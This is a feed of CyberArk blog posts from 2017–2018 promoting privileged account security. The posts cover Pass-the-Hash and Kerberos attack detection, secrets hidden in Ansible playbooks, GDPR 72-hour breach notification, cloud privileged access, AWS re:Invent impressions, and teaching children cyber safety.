As a refresher, PtH is an attack technique that leverages stolen credentials. It is often used in sophisticated attacks and represents a significant risk to organizations. This technique involves an attacker stealing account credentials from one computer and using them to authenticate to other access points in a network. Instead of requiring plaintext passwords, PtH attacks allow the attacker to authenticate with password hashes and begin lateral movement in the network over the NTLM protocol.

As part of this research, the Labs Team evaluated a number of scenarios for (PtH) NTLM connections to pinpoint key indicators and to help distinguish between legitimate and illegitimate uses. Based on this exercise, the team designed an algorithm and open source tool (called Ketshash) to aid in detecting live PTH attempts. You can also watch a short demo video of Ketshash here.

]]>
How to Achieve Sustained Success for Your Privileged Account Security Program https://www.cyberark.com/blog/achieve-sustained-success-privileged-account-security-program/ Tue, 30 Jan 2018 17:52:31 +0000 https://www.cyberark.com/?p=21829/

Many organizations have embarked upon a cyber security “sprint” in order to significantly reduce their privileged account attack surface. The sprint—designed to yield initial results in just 30 days—focuses on prioritizing the implementation of core controls to protect an organization’s most powerful and vulnerable accounts.

Bolstered by sprint-driven successes and momentum, it’s time for organizations to gear up for the next leg of their security program. They need to turn their “sprint” into a longer-term, sustainable cyber security program.  As part of the journey, security teams often have questions about the best path forward. For example, they ask:

  • “How do we choose different workflows and controls to implement?”
  • “How do we risk rank them?”
  • “What does an ideal state of security look like?”
  • “How do we track and measure success or even support the program from a people perspective?”

Let’s focus on two fundamental elements for a successful, long-term program. The goal is to significantly reduce the risk of privileged credential theft. Keeping the attack pathway in mind, you want to shut down access to credentials and minimize what attackers can do with any credentials that are exposed. Ideally, also limiting how far attackers or malicious insiders can move within the organization using a specific set of credentials.

One: Increase the Coverage of Privileged Account Security Controls across the Organization

During the “sprint,” organizations focus on protecting their most powerful accounts first. This typically includes steps such as isolating and monitoring access to domain controllers and member computers, implementing multi-factor authentication to protect high-risk privileged credentials, eliminating unnecessary accounts and privileges, and establishing credential boundaries.

During the next leg of the journey, the focus shifts to scale—or the implementation of basic credential management & session isolation for human user accounts across as many technologies as possible—while minimally impacting end user experience and productivity. These include accounts linked to Unix devices, databases, network devices and built-in back door IDs. These are very powerful accounts. They exist in every system, yet they’re not typically used on a day-to-day basis by end users. Organizations can move quickly to implement change and showcase demonstrable wins while causing the least disruption possible.

 Two: Create an In-Depth Layer of Controls within the Riskiest Assets in the Environment

When it comes to analyzing the risk of a particular work stream (defined as the combination of a particular platform and an account type), it’s important to take three key things into consideration. We sometimes refer to this as a “privilege triad”:

  • The scope of influence: How many different assets can I affect with a single privileged account? What can this access? Does it cross different network boundaries?  Does it cross different risk tiers?  Who currently has access to these IDs?
  • Level of privilege: How much can I do with a given privileged account once I hit a system? How are we granting privilege in the first place, and can we granularly control it?
  • Ease of compromise: What controls do I have, or lack, today within my environment for this particular work stream? Do people actually know about these credentials directly? Are they using them from their workstations? Are we rotating them? What sort of underlying vulnerabilities might exist within this particular technology to begin with?

This “privilege triad” can be used to evaluate any environment or work stream within an organization. Art Chaisiriwatanasai of KPMG shared a great example of how his company uses similar classification and risk-rating mechanisms to pinpoint high-risk assets in his CyberArk guest blog, Privileged Access Management: A Matrix Approach for Account Ranking and Prioritization.

To explore these control sets further, check out this short video that outlines three primary phases our solutions engineering team often recommends for improving privileged account security.

]]>
Malware, Mistakes and Meaningful Measures to Protect Critical Infrastructure https://www.cyberark.com/blog/malware-mistakes-meaningful-measures-protect-critical-infrastructure/ Thu, 25 Jan 2018 17:21:14 +0000 https://www.cyberark.com/?p=21714/

Security and industry experts have long advocated for the need to increase the protection of critical infrastructure – including transportation systems, energy and utilities providers, and financial services. The implications of an attack on our nation’s systems are far reaching – from disrupting delivery of key services to impacting public safety.

Just recently, researchers presented an analysis of Triton, a malware used in the third ever recorded cyber attack against industrial equipment. Findings indicate that the malware was able to enter the plant via an exploit in “security procedures that allowed access to some of its stations as well as its safety control network.” Additionally, recent erroneous alerts regarding missile strikes caused panic in Hawaii and Japan – each alleged to be the result of human error. These incidents shine an important light on the cyber security procedures used to safeguard these critical systems – from external attackers or insiders, whether intentional or not.

From an attacker perspective, whether they already compromised the network or target a specific mission critical objective, their TTP (tactics technique and procedure) will include getting access to privileged accounts to achieve their ultimate goal.

Historically, we’ve seen situations where the software and systems used to run critical infrastructure were compromised through shared privileged accounts and default passwords that haven’t been changed. These hardcoded passwords are static and can be guessed or brute forced by attackers. Once attackers gain access to privileged accounts, they can gain full control to the system.

In past attacks on similar systems, the attackers used this access to emergency communications for ‘prank attacks,’ such as the case in Montana in 2013 where a zombie outbreak was broadcast to residents. In light of the severity and panic-inducing nature of the recent erroneous emergency reports, these former ‘prank attacks’ take on a more ominous outlook in demonstrating the destructive potential of such false alerts.

These examples also provide insight into how malicious attackers could compromise sensitive systems and infrastructure, as well as the steps needed to protect them from outside attacks. This starts with identifying where privileged accounts exist, implementing stronger management of the credentials that provide access to and control over such critical infrastructure, and ensuring ongoing management and visibility into those accounts.

]]>
One Key and Five Minutes Can Leak Millions of Records https://www.cyberark.com/blog/one-key-five-minutes-can-leak-millions-records/ Fri, 19 Jan 2018 03:16:11 +0000 https://www.cyberark.com/?p=21459/

An explosion in the number of applications and machines throughout IT environments has made IT automation and configuration tools such as Ansible a necessity. This trend is related to the increased adoption of DevOps practices where the line between development and operations has been erased. DevOps automates the software delivery pipeline and utilizes innovative, robust tools to deploy environments, scripts and applications. Functions within traditional operations roles are being fully replaced by a machine. This includes using powerful secrets to access and control IT infrastructure. To achieve a faster go-to-market execution and improved ROI, IT admins have been known to store secrets in Ansible Playbooks.

Tools such as Ansible help to modernize IT environments, enabling applications to deply faster with improved quality. These tools delivers simple IT automation that ends repetitive tasks and frees up DevOps teams for more strategic work. Within the DevOps tool chain, secrets are necessary to build today’s modern applications. Against security best practices, these secrets are frequently embedded directly into code or configuration files like Ansible Playbooks. When these tools or files are compromised, the secrets and the access they provide are also compromised, leaving organizations both large and small vulnerable to an attack.

Secrets embedded in code resulted in the Uber breach that was revealed in 2017. The global ride share company stored its AWS keys (one type of secret) in a code repository that attackers were able to pull and leverage to gain direct access to millions of unencrypted files containing personal information.

This is not a standalone incident for hackers. They’re proactive. They have bots crawling all over GitHub seeking to gain access to secrets that were mistakenly published online.  Attackers are doing this because they have had success. Many organizations continue to store secrets in code or configuration files and finding the secrets within tools like Ansible, that control a very large numbers of tasks, can certainly be an uphill climb.

For years, the CyberArk Discovery and Audit™ (DNA) tool has provided organizations with the ability to first discover and later audit their environment. The tool automatically scans the network, which otherwise is a complex, manual process, for the following:

  • Data related to privileged and non-privileged accounts
  • Embedded and hard-coded application credentials
  • SSH key exposure
  • Potential credential theft risks, including Pass-the-Hash attacks, Pass-the-Ticket and Overpass-the-Hash

The easy-to-use scanner automatically discovers and analyzes any privileged and non-privileged accounts, then generates a report and visual organizational maps that illustrates the privileged account security status in the organization.

CyberArk DNA now provides the ability to automate the discovery of hidden credentials within Ansible (e.g. Playbooks, Roles and Tasks). This improves and simplifies the security of CI/CD tools and provides CISOs with a powerful tool to help discover and understand the risks of hidden secrets within their DevOps environments. This integration further bolsters the partnership between CyberArk and Ansible. Recently, CyberArk Conjur joined forces with Ansible to build integrations that deliver off-the-shelf, automated secrets protection and best practices throughout the DevOps pipeline.

How it works 

CyberArk DNA will scan an entire network to detect Windows and Unix/Linux instances for privileged and non-privileged secrets. On Red Hat instances, CyberArk DNA can detect an Ansible installation and search for Playbook yml (YAML) files. Once a Playbook has been discovered, DNA will then search for hard-coded secrets in Roles, Tasks and variables within a Playbook.

Figure 1. The CyberArk DNA dashboard provides a high-level review of all embedded and hard-coded credentials found on application servers including Ansible servers

At the end of the scan, DNA lists all of the discovered secrets details (e.g. user names, file location and password length) in a report and summarizes them in a very easy to consume format that can be shared with managers and executives to give them an overview of the current state of the domain.

Figure 2. From the DNA executive report data, a summary of all credentials found on all Playbooks from all scanned Ansible servers

Take the first step in discovering secrets within your DevOps pipeline

Interested in discovering hidden, unprotected credentials in your Ansible Playbooks? Request a FREE risk assessment with CyberArk DNA or reach out to your local sales representative for more information. Also, find out more about permanently removing embedded secrets from scripts and code by visiting CyberArk Conjur and try it for FREE with the Community Edition.

]]>
15 Cyber Security Stats At-a-Glance https://www.cyberark.com/blog/15-cyber-security-stats-glance/ Tue, 16 Jan 2018 20:13:45 +0000 https://www.cyberark.com/?p=21367/

Last year, the world witnessed a barrage of crippling cyber attacks—from the unprecedented breach of a Credit Bureau that compromised personal data of 145 million consumers, to leaked government tools belonging to the NSA, to major ransomware campaigns including WannaCry, Bad Rabbit and NotPetya, to revelations that Yahoo’s breach included 3 billion accounts. Many of the most destructive cyber attacks in 2017 were executed by successfully exploiting privileged accounts. Unsecured privileged accounts give attackers access to your highest value assets and data.

As the attack surface continues to expand on pace with technological advancements, the threat will only increase without mitigation. Following is a list of 15 cyber security stats, curated from a number of industry sources, to help illustrate the current landscape and underscore the urgency of putting privilege first in 2018:

  1. By 2020: 4 billion people will be online, 50 billion devices will be connected to the internet and data volumes will be 50x greater than they were in 2016 (Source: Microsoft)
  2. Percentage of computer users who will click on a link from an unknown sender: 50 percent (Source: TechRepublic)
  3. Amount of money that ransomware victims have paid out over the past two years: $25 million (Source: The Verge)
  4. Global average cost of a data breach: $3.62 million (Source: IBM)
  5. Average cost for each lost or stolen record containing sensitive and confidential information: $141 (Source: IBM)
  6. Number of unfilled cyber security jobs by 2021: 5 million (Source: CSO Magazine)
  7. Average number of days attackers spend inside systems, undetected: 99 days (Source: FireEye)
  8. Percentage of organizations who admit to not fully informing customers when their personal data was compromised in a cyber attack: 50 percent (Source: CyberArk via Vanson Bourne)
  9. Percentage of security pros who say their organization can’t stop every attempt to break into their internal network: 46 percent (Source: CyberArk via Vanson Bourne)
  10. Percentage of boards that participate in the review of current security and privacy risks: 31 percent (Source: PwC)
  11. Percentage of business leaders who do not understand what they should do if a cyber security incident occurs: 52 percent (Source: CyberArk via Vanson Bourne)
  12. Organizations currently using cloud services: 93 percent (Source: McAfee)
  13. Organizations actively using containers today: 83 percent (Source: Forbes)
  14. Percentage of security and DevOps pros who failed to identify all places where privileged accounts or secrets exist: 99 percent (Source: CyberArk via Vanson Bourne)
  15. Percentage of security pros who report that their organization has not implemented a privileged account security solution for DevOps: 73 percent (Source: CyberArk via Vanson Bourne)
]]>
What do Cyber Professionals Teach Children about Security? https://www.cyberark.com/blog/cyber-professionals-teach-children-security/ Tue, 09 Jan 2018 15:30:41 +0000 https://www.cyberark.com/?p=21123/

Winter break is over, and children have returned to school armed with new phones, laptops and other devices. I witnessed the excitement of a pair of fifth graders receiving laptops for Christmas. I can’t recall what I wanted at that age—probably games or a bike—but surely a laptop wasn’t on my list.

I watched one sister help the other to set up her laptop. Her father set up hers first, and after he left the room, she decided she knew enough to help her sister. She paused the wizard once to ask me if they should accept the software update. These eleven-year-olds created their own login credentials, entered their home network password and quickly finished the set up process. I asked what they planned to do with their laptops. School work was the first answer, watching videos on YouTube followed, and then I zoned out because I was distracted by a moment of fear, considering all of the bad that comes with the good of having access to the internet.

My follow up questions focused on what they learned in school about cyber security. The answer—not that much, even in their upscale neighborhood elementary school. They have basic awareness with terms such as “attackers,” and they know not to share passwords, but the learning curve is steep. Parents have to take and maintain a leading role in cyber security education, and they also should establish guidelines and rules that can be followed / monitored. At the very least, like everything else in life, they need to provide enough information to help children make good, informed choices.

Obviously, there are many articles available to help parents inform children, but let’s face it, many adults don’t even understand or follow best practices. I couldn’t help but wonder, do parents who work in the cyber security industry do a better job of teaching children about cyber security best practices?

I asked a few of my colleagues about what they teach and what information they believe to be the most important. I was pleasantly surprised to learn that many of them volunteer as guest speakers on the subject at local schools.

From these conversation three themes stand out:

  • Privacy: The lives of children are documented in an unprecedented way considering the high volume of photos, selfies and other information that is shared online from a young age—often by parents who are thrilled to share every milestone. Explaining the concept and value of privacy is an important lesson. Children frequently use devices to share pictures, experiences, thoughts and more, so they have to learn there are lasting consequences – their digital profile builds over time with every action. Screenshots are just one way to extend the reach and shelf life of a message or image. Encourage them to think of examples of what they shouldn’t share including inappropriate pictures and potentially offensive posts.  Remind them everything is public. After all, there aren’t secrets online. It’s easy to make a mistake that might be irreversible and hurt many.
  • Power: One of my colleagues recently had a session with high school students. They talked about the concept of security and the consequences of being unsecure. He used some examples to help students think like an attacker in order to better understand the importance of defense. Students today have access to powerful tools that are freely available online and can do a lot of damage if used inappropriately. For example, there are encryption packages available for download, there are open source offensive tools in GitHub, and there are services that provide extreme compute, storage and analytics resources. Such resources can support brilliant and cool projects, but these tools could also be used “offensively” to spread ransomware and other malwares or to attack websites using DDOS attacks. Perhaps here, children can draw lessons from their favorite superhero and decide to use power appropriately and ideally for good intentions.
  • Responsibility: A laptop with an internet connection provides a lot of power to an individual. It can be used for great projects or malice. As the saying goes, “With great power comes great responsibility.” This is a foundational concept—a philosophy—we all strive to be responsible citizens, adults, parents etc. I suppose the goal is to teach children to consider the options they have in any given situation. Encourage them to ask questions to more fully understand the consequences of their actions and the identities of those with whom they interact. It’s important to remind them not to be so trusting as people are not always who they appear to be online.

Interestingly, in most states in the US, teenagers have to take driver’s education often either privately or at school as they learn how to drive. They practice driving many hours with adults before they take an exam. With technology, we just hand it over. Increasingly, at a younger age. Food for thought.

]]>
Understanding and Selecting a Secrets Management Platform https://www.cyberark.com/blog/understanding-selecting-secrets-management-platform/ Tue, 02 Jan 2018 17:36:06 +0000 https://www.cyberark.com/?p=20960/

As we kick off 2018, what hopefully is a very promising and secure year for you, it’s a good time to consider how securing secrets in your DevOps pipeline can reduce your risk exposure and attack surface. We recently posted an article on our blog exploring some of the many challenges security teams and enlightened developers face in managing the proliferation of secrets and privileged users throughout the DevOps pipeline. Basically, we addressed how to significantly reduce risk—without impacting velocity or negatively impacting the work of developers.

This can, understandably, seem like a daunting task, particularly when you consider the countless non-human actors—processes, services, containers, hosts and more—that constantly need privileged credentials to do everything from accessing other resources and services to communicating with databases to obtaining encryption keys. While certainly not a brand new phenomenon, organizations’ increasing reliance on automated cloud services, container-based deployments and micro services-based architectures has illuminated a massive gap in how they manage machine identities for non-human actors, or in other words, how they protect the secret information flowing from machine-to-machine with little or no human oversight. Remember—we’re no longer talking about securing a finite number of machines sitting on a rack somewhere, but instead, hundreds upon thousands of virtual machine instances running simultaneously at any given point in time.

For organizations that take advantage of DevOps’s agility without adequately securing the secrets and credentials used in their DevOps environment, there is urgency to take action.  DevOps automation not only builds and deploys apps at scale, but it also creates and assigns credentials and secrets at scale. If these secrets aren’t adequately secured and protected, then as the apps scale, the enterprise creates an ever-increasing technical debt of vulnerabilities.  Basically, the problem may be getting worse, at scale.

How can organizations get started? Some traditional security solutions for secrets management are simply not a great fit in today’s modern era of clouds, containers and DevOps. As a result, a new wave of “secrets management” platforms is emerging, and it’s changing the way organizations deliver identity, secrets and tokens—as well as the way they validate systems for automated establishment of trust.

The independent analyst firm Securosis has published new research examining the critical need for such modern secrets management tools. The crux of the paper, Understanding and Selecting a Secrets Management Platform, addresses the fact that security around provisioning access rights to services is largely absent today. Far too often, credentials are kept in cleartext within documents of various types, while many companies rely on identity stores’ systems to maintain a central point of control over identity and access rights. Yet, these systems lack a distribution mechanism to consistently support security policies across today’s mixed and increasingly complex cloud and DevOps environments.

Available for free download here, the Securosis research paper outlines:

  • The Challenge of Machine Identities: From both the security practitioner’s and the developer’s perspective.
  • Principal Customer Use Cases: A diverse set of real-life use cases, including API Gateways and access keys, services, build automation, provisioning machine identities, encrypting data and sharing.
  • Features and Functionality: The basic functions every secrets management platform needs to address, as well as advanced feature sets that are emerging, comprising deep log creation and integration options, tighter integration with IAM services, secret generation and secret revocation.
  • Deployment Considerations: How these platforms deploy, how they provide scalability and resiliency and how they integrate with the services they supply secrets to.

Effective secrets management is integral in transforming DevOps as we know it to a truly integrated secure DevOps, or DevSecOps model. We encourage you to download this timely piece of research. To learn more about the industry’s only platform-independent secrets management solution specifically architected to protect containerized and cloud-native applications across the DevOps pipeline, visit the CyberArk Conjur page.

Editor’s note:  Join CyberArk and Securosis Security Analyst, Adrian Lane,  for webinar on January 25, 2018: “Secrets Management – Where Security and DevOps Intersect.”

]]>
Using Azure, AWS or Google? Protect Privileged Accounts in the Cloud for Consistent Enforcement of Security Policies https://www.cyberark.com/blog/using-azure-aws-google-protect-privileged-accounts-cloud-consistent-enforcement-security-policies/ Thu, 28 Dec 2017 17:33:25 +0000 https://www.cyberark.com/?p=20875/

CyberArk enables organizations to protect cloud assets by providing powerful solutions for securing privileged accounts and credentials at each stage of the cloud journey.

An increasing number of organizations don’t use just one cloud provider. For various reasons including business flexibility, multiple business lines, prior acquisitions, geographic coverage and redundancy, they use multiple cloud providers. Additionally, large organizations often have legacy, on-premises and hybrid environments, in which case, the same IT administrators may access and manage multiple compute, development and automation environments.

CISOs and IT leaders want, as a best practice, to be able to enforce the same security and access policies across the entire enterprise regardless of the compute environments, delivery pipelines and automation tools.

To implement this best practice, enterprises typically want to manage privileged user credentials and access permissions with a digital vault as a single control point.

CyberArk provides solutions for Azure and other cloud providers, including AWS and Google. In response to strong customer demand, CyberArk continues to enhance and expand its cloud and DevOps capabilities to meet the evolving needs of organizations adopting the cloud.

Whether your organization has fully embraced the cloud or is just starting the journey, it is essential to implement robust privilege management policies to protect your cloud assets. CyberArk has the solutions, resources and cloud expertise to help enterprises protect and secure the “keys to their cloud kingdom.”

For more information about securing your cloud assets, please check out “Securing the Enterprises Cloud Workloads on Microsoft Azure” and other resources available on our website.

]]>
Security is a Commercial Reality https://www.cyberark.com/blog/security-commercial-reality/ Fri, 15 Dec 2017 13:52:10 +0000 https://www.cyberark.com/?p=20472/

With high profile breach revelations seemingly part of the weekly news cycle and hard-hitting legislation like General Data Protection Regulation (GDPR) applying pressure to organizations worldwide, security awareness and best practices are now wound irretrievably into everyday commercial reality.

This, of course, is not news to IT security professionals, but what do C-level executives, departmental heads and functional leads make of security and how do they perceive its practice and importance?

The CyberArk Global Advanced Threat Landscape Report 2018 found that many organizations don’t seem to take data breach notification seriously. Half (50%) of the 1,300 plus respondents say their organization did not fully inform customers of past personal data compromises.

Organizations that are not fully transparent about data breaches affecting sensitive data risk serious consequences, such as loss of customers, executive turnover and increasingly severe regulatory penalties.

The ramifications are particularly significant for organizations that do business in the EU, where the GDPR data privacy law mandates pressing new obligations for data transparency.

The regulation, which goes into effect May 25, 2018, requires that companies must promptly inform regulators of a breach within 72 hours of discovery. Failure to do so could result in penalties of up to $24 million or 4% of annual global revenue, whichever is higher.

Is this a real problem or is the risk of a breach a low-level concern? Security professionals that answered our survey were not confident that a serious cyber security breach could be prevented; nearly half (46%) said their organization would not be able to stop every attempt to break into the internal network.

Consumers are increasingly aware of data privacy risks and organizations need to protect their sensitive information, so it is more important than ever to properly safeguard personal data and to be prepared to act, quickly and transparently, should a compromise occur. This is not a problem limited to the security team; it is a problem for the entire business.

With serious potential consequences, it’s not surprising that business respondents in our report believe that the executive team should take a more proactive role in cyber security awareness. In fact, more than three-quarters (78%) of line-of-business respondents say security should be discussed more frequently at the board level.

In this regard, business leaders are right on the mark. Senior executives must take responsibility and accountability for cyber security initiatives to effectively close the awareness gap and strengthen security programs.

To learn more about business leaders’ attitudes and practices around cyber security, read the CyberArk Global Advanced Threat Landscape 2018 Report.

]]>
Countdown to GDPR: Responding to the 72-hour Notification of a Personal Breach https://www.cyberark.com/blog/countdown-gdpr-responding-72-hour-notification-personal-breach/ Tue, 12 Dec 2017 17:00:16 +0000 https://www.cyberark.com/?p=20403/

Here’s a million dollar question (which could quite literally be a million dollar question, given the potential fines in play): How fast is your organization able to respond after a personal data breach? The General Data Protection Regulation (GDPR), which goes into effect May 25, 2018, requires that organizations report unauthorized access to personal data within 72 hours of detection.

If you’re thinking that seems like a tight window—you’re right. According to a recent industry study, only 10 percent of breached organizations were able to notify regulators within 72 hours of discovering a breach. Moreover, 38 percent reported notification took two to five months to complete.

Beyond this initial notification, GDPR Article 33 also requires that organizations describe and document the following information:

  • The nature of the personal data breach, the categories and approximate number of data subjects impacted
  • Likely consequences
  • Measures taken or proposed to be taken by the controller to address the personal data breach

The sobering truth is that attackers are likely hiding inside your environment right now, undetected, navigating the network in search of the right pathway to access sensitive data. To rapidly and accurately report on a breach—or, better yet, detect a threat before a breach occurs—you need robust operational controls. A strong Privileged Account Security strategy is critical to such control.

Detect and Block Threats Early in the Attack Cycle

Security tools and solutions are continuously developed to protect organizations from existing vulnerabilities and threats. But, attackers are often a step ahead, plotting new, sophisticated ways to infiltrate organizations.That’s why it’s critical to adopt an attacker’s mindset when bolstering your security practices in preparation for GDPR. To do so, it’s important to detect and block threats early in the attack cycle. Consider these four steps:

  • First look for exposed privileged accounts. Do you have a solution in place for exposed credentials and unconstrained delegation alerts? Unconstrained delegation gives a service the ability to impersonate a user in another service. This presents a security impact. When unconstrained delegation has been enabled, as the privileged user connects to your machine, their ticket-granting-ticket (TGT) will be stored in memory, which can be replayed to move laterally and compromise a domain controller.
  • Identify controls that can bypass privileged account security. Privileged accounts are a significant vulnerability when unsecured, and they exist across every organization. Can you identify how many privileged accounts and service accounts you have under management? Are they secured? Is there a solution in place that can detect suspected credential theft or rotate credentials and passwords to prevent attackers from escalating privileges and navigating their environment?
  • Identify attacks known to bypass authentication. Do you have a way of detecting attacks that exploit Kerberos authentication? These attacks can be very damaging—some of which provide significant, unrestricted access and unlimited time for reconnaissance. Are you considering attacks that are launched deep within the network?
  • Detect the abuse of privileged access. Can you clearly define the type of activity that is normal? In other words, business as usual versus activity that is anomalous and may be risky to the organization? Are you taking that risk-based approach to privileged account security? Do you have a solution that will prevent attackers from gaining access to critical systems and applications that are holding sensitive personal EU data?

Blocking unauthorized access to personal data helps you prevent reportable data breaches in the first place. As much as possible, automatic detection and blocking access should be a proactive function built into your Privileged Account Security solution. This type of early detection is different than perimeter defenses, which are monitoring and security controls focused on protecting your systems from attacks from the outside. A strong Privileged Account Security strategy focuses on proactively detecting threats to personal data from the inside out. Real-time profiling and analyzing individual privileged session behavior within the network can help an organization detect breaches early, with prioritized alerts, when abnormal activity is detected.

In our second GDPR advisory, we outline a list of proactive detection and privileged access accounting checkpoints to help you prepare for GDPR notification and reporting requirements. To learn more about detecting and responding rapidly to breaches, contact your sales representative, view our on-demand webinar series, or visit here to learn how CyberArk can help your organization with GDPR readiness.

Related Resource: Infographic: Responding to the 72 Hour Notification of a Personal Data Breach

]]>
AWS re:Invent Delivered Lots of Excitement and News, Yet Security Awareness Lags for Some https://www.cyberark.com/blog/aws-reinvent-delivered-lots-excitement-news-yet-security-awareness-lags/ Fri, 08 Dec 2017 01:35:17 +0000 https://www.cyberark.com/?p=20292/

Last week, I joined about 40,000 people at the AWS re:Invent. While clearly AWS- focused, the conference has become the leading cloud, and maybe even the leading infrastructure, event. With information on cloud and DevOps in sessions and on the show floor, it was great to be there. There was also the bonus of having the Gartner Identity and Access Management (IAM) Summit in Vegas during the same week, and I’ll include some details on that below.

Demoing New Capabilities

Product management, product marketing and our systems engineers took the opportunity to talk to many developers and IT professionals at re:Invent, and we gained helpful insights about some of the immediate and emerging security challenges that customers face and want CyberArk to address. More  to come on that in 2018. We also got very positive responses from our demo of the Conjur secrets management solution for DevOps, especially showing off the UI and then switching into code. There was a lot of interest in the Open Source version. We also demoed our integrations with AWS ,including the CyberArk Amazon Machine Images (AMI) and Cloud Formation Templates (CFT), and the recently announced integration of the Enterprise Password Vault with AWS CloudWatch that automatically on-boards SSH keys for newly created instances.

Security Is A Priority – But Not Everyone Addressing

While there was significant emphasis on security at the event, AWS continues to emphasize the shared responsibility model. AWS announced several enhancements to its identity and security offerings, but it struck me that there are still some major, unaddressed gaps in cloud and DevOps security awareness and needs. Moreover, even heightened awareness of the vulnerabilities does not always drive remedial action.

The good news, for you, is that if you’re reading this post you probably know CyberArk, in which case you are likely already ahead of many of your peers.  I had the opportunity to speak to several very knowledgeable and savvy developers and cloud engineers at re:Invent.  My impression was that while there is tremendous interest in learning more about securing cloud workloads and DevOps environments, many organizations have a long way to go. For example, I spoke with several people that still hardcode credentials, secrets and access keys; others are stringing together multiple tools and environments to store their secrets. These security gaps are significant. But, if you’ve evaluated the Conjur Community Edition (available at conjur.org at no cost), or if you already use CyberArk Conjur, CyberArk Enterprise Password Vault or other CyberArk solutions, you are likely on the right track to address your organization’s cloud and hybrid security concerns. If not, please reach out to us.

Expanding AWS Capabilities

No surprises here, but AWS continues to aggressively expand its platform and offerings, including several developer focused offerings, APIs, and integrated tools such as the browser-based AWS Cloud9 Integrated Development Environment (IDE), and the expansion of AWS Lambda, serverless computing capabilities.  AWS also announced significant expansion of its Machine Learning (ML) capabilities with Amazon SageMaker and Artificial Intelligence (AI) capabilities with AWS Rekognition as well as video analysis for live streaming and translation services (which tie back to ML and AI). These initiatives aim to make powerful ML and AI capabilities accessible to developers across a range of organizations. While these new AWS capabilities have some of the same security needs as other cloud based services (S3, EC2, etc.), they each likely require vast amounts of data – which IT and security professionals will need to protect. Innovative companies will leverage these capabilities to offer new services, and of course, AWS is motivated to increase adoption of cloud-based services. These new capabilities have the potential to accelerate an enterprise’s cloud journey, but also potentially expose new security needs to address. Our goal is to be ready for you at each stage of your cloud journey.

For more detail on the developer highlights, refer to “AWS re:Invent Recap – Amazon Lures Developers With New Tools And APIs” by Janakiram MSV — published in Forbes.

Gartner IAM

Cloud and DevOps topics were also front and center at the Gartner Identity and Access Management (IAM) Summit. Attendees explored how both market and technology forces are shaping the future of IAM, and participated in deep dives on topics ranging from analytics and blockchain, to artificial intelligence and microservices. A few of the highlights included a session by Gartner Research Director Felix Gaehtgens, “Manage Privileged Access to Reduce Security Risks and Increase Agility,” that covered privileged access management (PAM) fundamentals, an overview of available tools and a peek at technologies along the PAM maturity curve. Additionally, Research VP Lori Robinson’s session, “Protect the Keys to the Kingdom! Secure Privileged Access in an IaaS Environment,” honed in on privileged access as an essential security control in IaaS environments for risk mitigation.

A colleague and I presented “CyberArk: Privileged Related Risks Lurking in Your Cloud? Halt Stealthy Threats” at the Summit. The slides are available here.

Making Security a Priority

Bottom line – it was a very enlightening and productive week in Vegas with the two conferences, where it was clear that identity and security for cloud and DevOps will continue to be a top-of-mind priority for enterprises. On a side note, at the parent teacher conference I attended this week, I discovered my high school senior’s programing class uses the AWS Cloud9 development environment – no surprise, but security isn’t yet on their agenda. I think (hope) we all know it needs to be on the top of ours!

For additional information, please visit Cyberark.com/cloud, or to download the open source edition of our secrets management solution visit conjur.org.

]]>
Preventing Attacks Launched Deep within the Network https://www.cyberark.com/blog/preventing-attacks-launched-deep-within-network/ Thu, 07 Dec 2017 14:45:15 +0000 https://www.cyberark.com/?p=20262/

Attacks that exploit Kerberos, a Windows authentication protocol, have been behind some of the biggest breaches in recent history. These attacks are troublesome for many different reasons, including a complete and total loss of control over the domain controller. Threat actors have uncovered a number of different vulnerabilities that exist within the Kerberos protocol, and when successful, they’re able to elevate unprivileged domain accounts to those of the domain administrator account. The intent of the attacker is to leverage Kerberos tickets to appear to be a legitimate, fully authorized user when authenticating to various systems within the network.

These attacks are extremely difficult to detect, and even more difficult to prevent. Other solutions in the market have the ability to detect Kerberos attacks but come with limited functionality, agent-based performance issues, and well documented by-passing techniques calling into question the value and effectiveness of these solutions. CyberArk Privileged Threat Analytics is the only solution able to detect, alert, prevent and remediate a variety of different flavors of Kerberos-style attacks (Golden Ticket, Overpass-the-Hash, DCSync and PAC [MS14-068] attacks).

Attackers will get inside. It’s what they do. Far too many organizations continue to focus on defending solely against perimeter attacks without considering the impact and devastation of an attack launched from deep within the network. Moreover, while vaulting credentials is certainly a best practice, privileged credentials are often not required for the attacker to be successful in this type of an attack so organizations will undoubtedly benefit from the analytics capabilities CyberArk can provide. This type of attack needs to be prioritized and top of mind for every security operations teams.

In this demo, we walk through an example of how CyberArk Privileged Threat Analytics is able to not only detect, but also automatically stop an attack, preventing further damage to a domain controller. This scenario presents a situation where an attacker gains access to a compromised machine and utilizes a post-exploitation tool to move laterally to a domain controller. The attacker then uses a hash stolen from a logged-in user on the compromised machine, performs an Overpass-the-Hash attack, and gains access to the domain controller. Watch the video below to see how CyberArk detects this activity and breaks the attack chain before irreparable damage is done.

 

Request a live demo to see Privileged Threat Analytics in action or download the Data Sheet for more information.

]]>
Decoding DevOps Security: Insights for CISOs and Security Leaders https://www.cyberark.com/blog/decoding-devops-security-insights-cisos-security-leaders/ Tue, 05 Dec 2017 17:05:38 +0000 https://www.cyberark.com/?p=20203/

To increase the speed of delivering new software features and value to even the most “traditional” enterprise businesses, such as banking, utilities and staid government organizations, developers are shifting to a DevOps mode. Meanwhile, security teams scramble to secure and manage the plethora of new tools and technologies used to deliver on that promise. The biggest gap security teams face today is the massive proliferation of secrets and privileged users throughout the DevOps pipeline. Both teams have to deliver without compromising on security.

Now more than ever, it’s important to find a way to meet speed and agility with faster security and compliance delivery. But as a CISO, where do you start?

 First, while the list of tools and technologies can seem to be overwhelming and disparate, it’s important to remember that you do not need to know every single tool in order to help control the security of DevOps environments. A strong foundation requires a system-based approach that is API driven. APIs are the lingua franca of today’s software development systems, and it’s how next generation users and their technologies of choice will want to interact with security tools. The more abstraction of security “as a service” the better, because it shifts the burden of managing security policy, tooling and reporting from the development teams and puts the control back into the hands of the security team.

With this is mind, the security team needs a set of best practices based upon the desired security posture for the environment, AND THE PATH OF LEAST RESISTANCE for end users. You don’t want teams to come up with solutions or implementation details on the fly in order to meet their deadlines and deliverables.

Easy wins with the development teams include the following basic principles, because they already know these are good practices but just may not be doing them visibly or consistently:

  • First, no secrets in source control.
  • Second, follow least privileged access control across your entire infrastructure. The over-privileging of system accounts can be tremendous and very risky.
